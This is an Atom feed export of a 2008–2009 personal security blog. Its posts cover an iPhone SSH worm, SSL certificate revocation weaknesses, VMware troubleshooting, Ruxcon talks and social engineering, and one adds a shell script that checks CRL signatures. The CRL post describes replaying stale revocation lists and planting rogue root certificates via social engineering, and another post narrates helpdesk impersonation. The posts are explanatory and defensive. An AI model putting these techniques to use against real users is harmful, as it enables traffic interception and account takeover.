href="http://www.smh.com.au/technology/security/rickrolling-iphone-hacker-ashley-worm-or-boy-wonder-20091113-id2g.html"&gt;story&lt;/a&gt; interests me on so many levels. &lt;br /&gt;It has put Wollongong on the map again, people. I'll admit I was raised in the Gong, so it is good to see someone from Wollongong achieving even notoriety. The last renowned intelligent export we had was Evelyn Owen or Sir Lawrence Hargrave (1939 and 1915 respectively), so it has been some time between.&lt;br /&gt;I also dislike Apple; their practices annoy me. Their practice of dumbing down everything, even the extremely technical, is the same as dropping superfluous words from the English language to make it easier for speakers; we only need one word for cold, right? They also stand on the shoulders of giants, yet give little recognition to those giants. Yes, they made Unix "usable" (so did Linux, without the pompousness), but try to find their references of gratitude for all their stolen code, or stolen ideas: nope. Apple have fallen down in the security world repeatedly, and this is a glaring example. Who sets the same password on every device when you can assume with pretty high certainty that people are going to attack it and find out that password? Hence the worm walking straight in over SSH on jailbroken phones.&lt;br /&gt;The other reason this is interesting is that it is a virus that Rickrolls people, hilarious. Rickrolling is something I have done, and had done to me a fair few times, and it almost always makes me smile. 
The other humorous point of this is that the author is Ashley Towns, so the Rick Astley meme is almost made for him.&lt;br /&gt;Well, if you own an iPhone (hisss) then you can secure it against this virus &lt;a href="http://www.redmondpie.com/how-to-secure-your-jailbroken-iphone-from-ssh-hack-9140084/"&gt;here&lt;/a&gt; (running passwd to change the default root password fixes it); bear in mind that this virus will probably hang around for a few years like Code Red and Slammer. Funny stuff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-7410565729278708092?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/7410565729278708092/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=7410565729278708092' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/7410565729278708092'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/7410565729278708092'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2009/11/rickrolling-has-gone-viral-again.html' title='Rickrolling has gone viral again'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-6916027984983832903</id><published>2009-09-02T10:39:00.005+10:00</published><updated>2009-09-03T00:58:32.748+10:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='web-security'/><category scheme='http://www.blogger.com/atom/ns#' term='ssl'/><category scheme='http://www.blogger.com/atom/ns#' term='web'/><title type='text'>Revocation, just rolls off the tongue</title><content type='html'>First, an overview: SSL is pretty much the only protection available when banking, shopping and so on. The user has to look for https:// rather than http:// in the address bar to know the session between their browser and the site's server is encrypted in transit (this isn't perfect; certificates can be obtained fraudulently, and security researchers find holes in the implementations all the time). Don't trust the lock or the little green bar that EV certs give you on their own, as a page can imitate both in several ways; generally, though, the https scheme and the certificate details the browser shows can be trusted. Also look at the Firefox extension SSL Blacklist, which will notify you if a certificate is bad for one of several reasons.&lt;br /&gt;One of the interesting things about certificates is that they have to be revocable, for when a key is compromised or a certificate was issued in error.&lt;br /&gt;A CRL, or certificate revocation list, is the list of serial numbers of every certificate the issuing CA has revoked, published at a URL the CA writes into each certificate it issues (the CRL Distribution Points extension). Excellent idea, but look at most certificates' details and the CRL is hosted on good old plain http, e.g. http://crl.thawte.com/ThawteSGCCA.crl&lt;br /&gt;YAY. So poison a few DNS lookups for those CRL hosts, or man-in-the-middle (MITM) a user (can we say web cafe?), and you decide what CRL their browser sees. The obvious aims are to "revoke" heaps of certificates, or to hide the revocation of the cert for their bank. 
Of course there are a lot of variables here. If you are in the middle you see every CRL request, so you don't need to guess which CRL or which sites the user will go to; you answer whatever is requested. What you cannot do is forge the list itself: every CRL is signed by the issuing CA's key (the signature is part of the format), and a client that checks that signature against the CA certificate in its trust store will reject a CRL you signed with your own key, no matter what you serve from the CA's URL.&lt;br /&gt;What you can do is replay. A CRL carries a thisUpdate and a nextUpdate, and a client will accept an old copy until nextUpdate passes, so serve up the genuine CRL from before the certificate was revoked and the revocation is invisible for that long. Most operating systems cache the list for the same window (often around 24 hours), which cuts both ways: a real revocation takes that long to reach clients anyway.&lt;br /&gt;As far as a denial goes you don't need to forge anything either; just block the CRL fetch. Most browsers then quietly treat the certificate as not revoked (soft fail), which is the bigger problem, and a client configured to fail hard can be kept off every site whose CA's CRL you block.&lt;br /&gt;To do any real damage you still need a fraudulently issued certificate, or a certificate that was revoked after the stale CRL you are replaying was issued, or a bit of social engineering: break SSL for the user, pop up a page saying they need to update their certificates, and redirect them to a legit-looking site that installs a certificate package full of your own generated root certificates. All SSL sites from then on are readable as you re-sign them with your key on the way through.&lt;br /&gt;Serving the CRL over https wouldn't fix this either: the client would have to check revocation on the CRL server's own certificate first, which is circular, so the design relies on the CRL signature rather than on the transport. I have even seen some installs of Internet Explorer that have certificate revocation checking turned off; I am not sure if that is the default, but it is bad nonetheless.&lt;br /&gt;&lt;br /&gt;Well, I hope this long-winded odd rant has at least made some people think. 
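A way to see the signature check and the replay window for yourself, as an added example that is not part of the original post: the script below builds a throwaway CA with the openssl command line tool, issues one CRL before a revocation and one after, and then runs the checks a client should run on any CRL it fetched over plain http. The CA name, the revoked serial 0A, the seven-day CRL lifetime and the temp paths are all made up for the example.

```sh
#!/bin/sh
# Added example (not from the original post): build a throwaway CA with the
# openssl CLI, issue one CRL before a revocation and one after, and run the
# checks a client should apply to a CRL fetched over plain http: verify the
# signature against the issuing CA and read the validity window. Everything
# here (CA name, serial 0A, 7-day CRL lifetime, temp paths) is made up.
set -e

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# make_ca DIR CN: self-signed CA plus the minimal database `openssl ca -gencrl` needs
make_ca() {
    mkdir -p "$1"
    printf '%s\n' '[ req ]' 'distinguished_name = req_dn' '[ req_dn ]' \
        '[ ca ]' 'default_ca = test_ca' '[ test_ca ]' \
        'database = index.txt' 'crlnumber = crlnumber' \
        'private_key = ca.key' 'certificate = ca.pem' \
        'default_md = sha256' 'default_crl_days = 7' > "$1/ca.cnf"
    : > "$1/index.txt"
    echo 01 > "$1/crlnumber"
    openssl req -x509 -config "$1/ca.cnf" -newkey rsa:2048 -nodes \
        -keyout "$1/ca.key" -out "$1/ca.pem" -subj "/CN=$2" -days 30 2>/dev/null
}

# revoke DIR SERIAL: mark SERIAL revoked in the CA database; the index.txt
# columns are type, expiry, revocation date, serial, file, subject
revoke() {
    printf 'R\t300101000000Z\t%s\t%s\tunknown\t/CN=revoked.example\n' \
        "$(date -u +%y%m%d%H%M%SZ)" "$2" >> "$1/index.txt"
}

# gen_crl DIR OUT: sign a CRL with the CA in DIR (OUT must be an absolute path)
gen_crl() {
    ( cd "$1"; openssl ca -config ca.cnf -name test_ca -gencrl -crldays 7 -out "$2" 2>/dev/null )
}

# verify_crl CRL CAFILE: true only if the CRL signature checks out under CAFILE.
# openssl prints its verdict on stderr, so both streams are captured.
verify_crl() {
    openssl crl -in "$1" -CAfile "$2" -noout > "$WORK/v.out" 2> "$WORK/v.err"
    grep -q 'verify OK' "$WORK/v.out" "$WORK/v.err"
}

# crl_lists_serial CRL SERIAL: true if SERIAL (upper-case hex) is listed as revoked
crl_lists_serial() {
    openssl crl -in "$1" -noout -text | grep -q "Serial Number: $2"
}

# crl_next_update CRL: the nextUpdate a client may keep using the list until
crl_next_update() {
    openssl crl -in "$1" -noout -nextupdate
}

make_ca "$WORK/ca" "Blog Example CA"
gen_crl "$WORK/ca" "$WORK/stale.crl"      # CRL 1: nothing revoked yet
revoke "$WORK/ca" 0A                      # revoke serial 0A ...
gen_crl "$WORK/ca" "$WORK/current.crl"    # ... CRL 2 lists it

# A man in the middle imitating the CA by name alone: same CN, different key
make_ca "$WORK/rogue" "Blog Example CA"
gen_crl "$WORK/rogue" "$WORK/rogue.crl"

for f in stale current rogue; do
    if verify_crl "$WORK/$f.crl" "$WORK/ca/ca.pem"; then v=OK; else v=FAIL; fi
    if crl_lists_serial "$WORK/$f.crl" 0A; then r=yes; else r=no; fi
    echo "$f.crl: signature=$v lists 0A=$r $(crl_next_update "$WORK/$f.crl")"
done
```

Run it with sh (any filename will do). The stale CRL still passes the signature check, because it really was signed by the CA, and that is exactly the window a man in the middle has: replay the older CRL until its nextUpdate and the revoked certificate looks fine. The rogue CRL carries the CA's name but fails the check, which is why the signature, not the transport, is what the client has to rely on.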
It is a very odd setup, and I am surprised CRLs don't require signing by at least two parties, kind of like nuclear launch codes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-6916027984983832903?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/6916027984983832903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=6916027984983832903' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6916027984983832903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6916027984983832903'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2009/09/revocation-just-rolls-off-tounge.html' title='Revocation, just rolls off the tongue'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-2814229329533683266</id><published>2009-06-24T19:36:00.002+10:00</published><updated>2009-06-25T08:57:13.585+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ESX'/><category scheme='http://www.blogger.com/atom/ns#' term='Availability'/><category scheme='http://www.blogger.com/atom/ns#' term='vmware'/><title type='text'>Vmware issues</title><content type='html'>Not so much a dedicated security issue (though Availability is in the CIA 
triangle that should be drummed into everyone by now), but something I thought I would blog about as I found it nowhere else.&lt;br /&gt;I was having an interesting issue with a guest on one of the ESX clusters I manage; looking at the ESX host, none of its other guests were having issues. The guest in question came up as disconnected, not powered on, but I could RDP to it.&lt;br /&gt;I logged into the host, checked esxtop and noticed the guest was in the list.&lt;br /&gt;Checking the tasks of the guest in the VMware client I noticed its VCB backup the night before had died, and that the error I was getting on the guest was "Unable to communicate with host, since it is disconnected"; I got the same message when trying to power on the guest. I quickly checked the vmware.log and dmesg on the ESX host that was hosting the guest: nothing obvious, and googling around gave me no answers. It was then I noticed the last entry in the vmware.log was from early that morning, to do with CD-ROM errors. I thought it could be a simple management-agent disconnect, so I ran&lt;br /&gt;&lt;br /&gt;/etc/init.d/mgmt-vmware restart&lt;br /&gt;The whole ESX server disconnected from the VMware client as you would expect, then it came back up, and the problem guest came back up too: no downtime, no mess (the management agent is separate from the running guests, which is why restarting it costs nothing). 
Ran a quick manual backup and all done.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-2814229329533683266?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/2814229329533683266/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=2814229329533683266' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/2814229329533683266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/2814229329533683266'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2009/06/vmware-issues.html' title='Vmware issues'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-5317505266357959125</id><published>2009-01-02T18:15:00.002+11:00</published><updated>2009-06-24T20:24:23.421+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ruxcon'/><category scheme='http://www.blogger.com/atom/ns#' term='Sydney'/><category scheme='http://www.blogger.com/atom/ns#' term='conferences'/><title type='text'>Ruxcon belated Day2</title><content type='html'>So this is really a belated day2, been fairly busy at work. 
We had an embargo for changes over December, but that didn't mean we didn't do work; we had fewer people on so we did more.&lt;br /&gt; I am going to put a bit more in than the initial recap I did of day 1; first the recap of day 2.&lt;br /&gt; Day 2 was well and truly on par with day 1; the Ruxcon guys put on an awesome con, and I had a great time.&lt;br /&gt; To recap on day two, I went first to an excellent talk by Ben Mosse entitled Browser Rider, then on to a promising tool, presented I thought somewhat apathetically, called Intelligent Webfuzzing by Neil and Bern Archibald. Then on to the BBQ lunch, where I had a chat with one of my security mentors, the venerable &lt;a href="http://marty.sunriseroad.net/"&gt;Martin Visser&lt;/a&gt; (he knows his Wireshark fu).&lt;br /&gt; After lunch I went to one of the highlight talks of the con, Netscreen of the Dead by Graeme Neilson (which I recently heard talked about on the PaulDotCom Security Weekly podcast). Then on to the smaller room 2 for Googless by Christian Heinrich, a fairly good talk but I think aimed more at those not up on their Google fu and scripting.&lt;br /&gt; Then finally on to a very interesting talk by Adam Daniel called Pimpin: Forensic Style.&lt;br /&gt;&lt;br /&gt;NOTE: the talk slides (not videos yet) are available &lt;a href="http://www.ruxcon.org.au/2008-archive.shtml"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I was going to talk about the day in more depth, but that is what has delayed this. 
I will post my notes one day.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-5317505266357959125?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/5317505266357959125/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=5317505266357959125' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5317505266357959125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5317505266357959125'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2009/01/ruxcon-belated-day2.html' title='Ruxcon belated Day2'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-5053741041775668389</id><published>2008-11-30T00:02:00.003+11:00</published><updated>2008-12-09T18:22:17.064+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ruxcon'/><category scheme='http://www.blogger.com/atom/ns#' term='general'/><category scheme='http://www.blogger.com/atom/ns#' term='conferences'/><title type='text'>Ruxcon 1st day</title><content type='html'>So I am back from the very awesome &lt;a href='http://ruxcon.org'&gt;Ruxcon&lt;/a&gt; and its after party. 
It felt good to be among my own people; I saw at least two other geeks wearing a "There's no place like 127.0.0.1" T-shirt, and several with other witty, geeky and/or security-related repartee.&lt;br /&gt;I saw some awesome talks, which I will go into in more detail later. I also met the venerable Patrick Gray of the &lt;a href='http://itradio.com.au/security/'&gt;Risky Business podcast&lt;/a&gt; and Adam Boileau, one of his regular knowledgeable guests.&lt;br /&gt;Some standout talks so far have been Enterprise Security, Softer than the foam on my Frappuccino by the LUMC Crew and Ghost Recon: Subverting Local Networks by Berne Campbell; I recommend you download them with slides when/if they become available.&lt;br /&gt;Well, peace out all.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-5053741041775668389?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/5053741041775668389/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=5053741041775668389' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5053741041775668389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5053741041775668389'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/11/ruxcon-1st-day.html' title='Ruxcon 1st day'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-1069849873879843875</id><published>2008-11-13T20:35:00.002+11:00</published><updated>2008-11-16T16:14:34.390+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='general'/><title type='text'>Welcome</title><content type='html'>Welcome everyone to my security blog. I &lt;del&gt;will&lt;/del&gt; have migrated over previous posts from http://www.morganstorey.com &lt;del&gt;as we go&lt;/del&gt;.&lt;br /&gt;All of the ones from the previous few months have been copied across; any beyond that will have been indexed by Google (and are from before I used tags, so it would take too long).&lt;br /&gt;I have added RSS and Atom feeds to both blogs; please subscribe over on the left if it interests you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-1069849873879843875?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/1069849873879843875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=1069849873879843875' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/1069849873879843875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/1069849873879843875'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/11/welcome.html' title='Welcome'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-6423684110685868876</id><published>2008-11-13T17:08:00.001+11:00</published><updated>2008-11-16T16:10:46.482+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Politics'/><category scheme='http://www.blogger.com/atom/ns#' term='Conroy'/><category scheme='http://www.blogger.com/atom/ns#' term='Kids'/><category scheme='http://www.blogger.com/atom/ns#' term='Australia'/><title type='text'>Makes the blood boil.</title><content type='html'>So if I haven't already ranted at you in some way, shape or form, you may not know of the Australian government's short-sighted plan to add us to the ranks of oppressive regimes such as Iran and China. In fact that is unfair, as Iran's proxy is considered to be looser than the one Senator Conroy wants to implement.&lt;br /&gt;The long and short of it is that Conroy wants to restrict what pages are available to Australian internet users. Sure, it is for the kids (won't someone think of the children)… But as I have said to people, I would rather my children see the entirety of the disgusting underbelly of the internet than have one single thought-provoking site blocked. Not to mention the degradation to performance in a country that is already considered one of the worst in the world for connectivity. In Sweden groups appealed to the government saying 100 Mbps is welfare. Here most people are still on 1/200th that speed, and with Conroy's plan that 1/200th would lose anywhere from 2 to 80% of its speed; welcome back to dial-up days.&lt;br /&gt;There are a plethora of sites that are likely to be blocked because they aren't "kid" friendly. 
June next year you will probably see the below when going to user-generated content sites such as YouTube and Facebook:&lt;br /&gt;&lt;img width="605" height="383" src="http://morganstorey.com/blog_files/2008/Australia-403.jpg"&gt;&lt;br /&gt;Here is a news flash, Senator: kids got hold of porn even in the pre-internet days, and they will even if you restrict it. So what you're doing will only have negative effects. Parents with no IT knowledge will have a false sense of security and not monitor their kids' browsing habits; those same kids will find ways around your precious filter, and the methods that become popular may even make it harder for parents and educators to monitor their usage. &lt;br /&gt;The filter will slow down internet access, and again the people with little IT knowledge will have no idea how to get around it for legitimate sites that are blocked. Then there is the cost, which you are expecting ISPs to mostly cover off their own bat, which will increase internet costs in a country that already pays too much for too little.&lt;br /&gt;Way to go, Senator, you deserve your award:&lt;br /&gt;&lt;img src="http://morganstorey.com/blog_files/2008/conroy-award.jpg"&gt;&lt;br /&gt;I feel lost; I don't know what to do. I feel as though someone has decided freedom of information is a bad idea, so let's mandate against it. Then what do you do? 
Once the book burning starts it is hard to stop.&lt;br /&gt;I have emailed the Senator and his opponents, and the letters are in the mail.&lt;br /&gt;I urge everyone to look at the following sites and take action: http://nocleanfeed.com your silence is all they need to pass this and then you are no better than them.&lt;br /&gt;Peace out all, except Conroy and his supporters who can just unplug their computers, televisions, and burn their books for the same effect they are trying to mandate.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS: I am starting up a dedicated security Blog as I want to separate the two, this of course crosses both blogs so expect to see it on both. My new Security blog is linked on the left or here: &lt;a href='http://security.morganstorey.com'&gt;http://security.morganstorey.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-6423684110685868876?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/6423684110685868876/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=6423684110685868876' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6423684110685868876'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6423684110685868876'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/11/makes-blood-boil.html' title='Makes the blood boil.'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-3175968345647774252</id><published>2008-10-08T20:51:00.000+11:00</published><updated>2008-11-16T15:54:42.588+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='social engineering'/><title type='text'>Social Engineering</title><content type='html'>I think possibly the equal first security threat facing all business today is that of social engineering. I say equal first because a lot of insider threats would probably fall under this banner. The employee, let's say his name is John, calls up the helpdesk and tells them his name is Sam and that he has forgotten his password. You of course see where I am going with this: the helpdesk happily resets Sam's password. John knows Sam is out to a long lunch and has access to files he doesn't. He logs in as Sam, gets the files he needs and then logs out, maybe even leaving a post-it on Sam's screen saying the helpdesk had to reset his password to blah, so the helpdesk doesn't get another call and get suspicious.&lt;br /&gt;John now has all the files on his cheap USB disk, or in hard copy, and does with them whatever it is nefarious people do with data to make a buck.&lt;br /&gt;I have seen mitigation techniques for the one I mentioned above: all users have a password reset word, something they wouldn't have as a password, stored in plain text for the helpdesk to see. This will mitigate it, unless John says he forgot it and asks them to send someone down; the helpdesk guy may not know John or Sam, and as long as John is in Sam's office still acting like he owns the place he will probably get away with it.&lt;br /&gt;Social engineering is scary for another reason, in that even non-technical users can do it. 
I remember I had a client once who had a relatively new employee call up asking for some permissions to files he needed for work. I knew his role was to do with those files and I knew his voice over the phone (as funnily enough he had moved from one client to another). Still I decided to call his manager to get the OK. She didn't give it, and was a bit disturbed that he had asked for the access. Hooray, one for the good guys.&lt;br /&gt;Have a look &lt;a href="http://www.5min.com/Video/How-to-Get-Into-Any-Club-14234755"&gt;here&lt;/a&gt; at how easily some guys doing a Sprite commercial pulled off some non-harmful social engineering.&lt;br /&gt;&lt;a href="http://www.securityfocus.com/infocus/1860/1"&gt;Here is a very thorough article on the subject.&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.cafepress.com/greatgeekgifts.292971928"&gt;And here is my first shirt design on cafepress, totally on topic.&lt;/a&gt;&lt;br /&gt;Really though, combine some social engineering with technical knowledge, the smarts to think of the good guys' mitigation techniques and the connections to make money off your exploits, and you have a major foe to be reckoned with.&lt;br /&gt;I think in future we will need to audit our people as much as we do our security systems. Having someone who won't suffer the repercussions of the law come in randomly and do spot checks would keep people on their toes, but it also comes down to having the personal touch: knowing people by name, by their voice, by their face. Maybe the solution is smaller decentralised IT departments, say one for each department and at least one at each site; this lessens the body of knowledge but increases the likelihood of the staff member knowing the other. 
I don't know, someone will come up with a solution eventually.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/3175968345647774252/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=3175968345647774252' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/3175968345647774252'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/3175968345647774252'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/10/social-engineering.html' title='Social Engineering'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-9093214094952767371</id><published>2008-09-29T19:07:00.000+10:00</published><updated>2008-11-16T16:08:02.931+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='physical'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft'/><category scheme='http://www.blogger.com/atom/ns#' term='wanderings'/><title type='text'>Lets get Physical</title><content type='html'>On the way back from a very interesting and informative Microsoft Security Summit the other day, I noticed something that caught my eye.&lt;br /&gt;Too many people concentrate on the hardware and software, and leave gaps. 
Gaps in the physical security, or gaps in the training of staff.&lt;br /&gt;This photo shows off both.&lt;br /&gt;&lt;a href="http://www.flickr.com/photos/changlinn/2898538146/" title="29/09/2008 by changlinn, on Flickr"&gt;&lt;img src="http://farm4.static.flickr.com/3137/2898538146_bca2520fb4.jpg" width="375" height="500" alt="29/09/2008" /&gt;&lt;/a&gt;&lt;br /&gt;Seems a cleaner at the train station near me had left the door open to the area where she kept her cleaning supplies, the same area that had a rack with a server, fibre switch, ethernet switch, patch panel and other miscellanea. What's that you spy? Yep, the rack door is unlocked too. Click click and a bad guy is on the network, just plug in a wireless router and see what traffic you can capture; it doesn't matter if this network is firewalled the best in the world, or even air-gapped, game over.&lt;br /&gt;Back to the security conference I attended: it was very interesting, but it was all covered under an NDA, except the bit at the end which I already talked about. I am starting a security group in Sydney, sponsored by Microsoft. 
So Jeff Alexander let everyone know, and I had a heap of business cards handed over from people that wanted to be kept in the loop; it is very exciting that we have this much interest already.&lt;br /&gt;Well, peace out all, and please lock your racks and don't put them in a room with a sink for the cleaner to use.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/9093214094952767371/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=9093214094952767371' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/9093214094952767371'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/9093214094952767371'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/09/lets-get-physical.html' title='Lets get Physical'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm4.static.flickr.com/3137/2898538146_bca2520fb4_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-6243120274056678338</id><published>2008-09-15T18:03:00.001+10:00</published><updated>2008-11-16T16:06:47.690+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security group'/><category scheme='http://www.blogger.com/atom/ns#' 
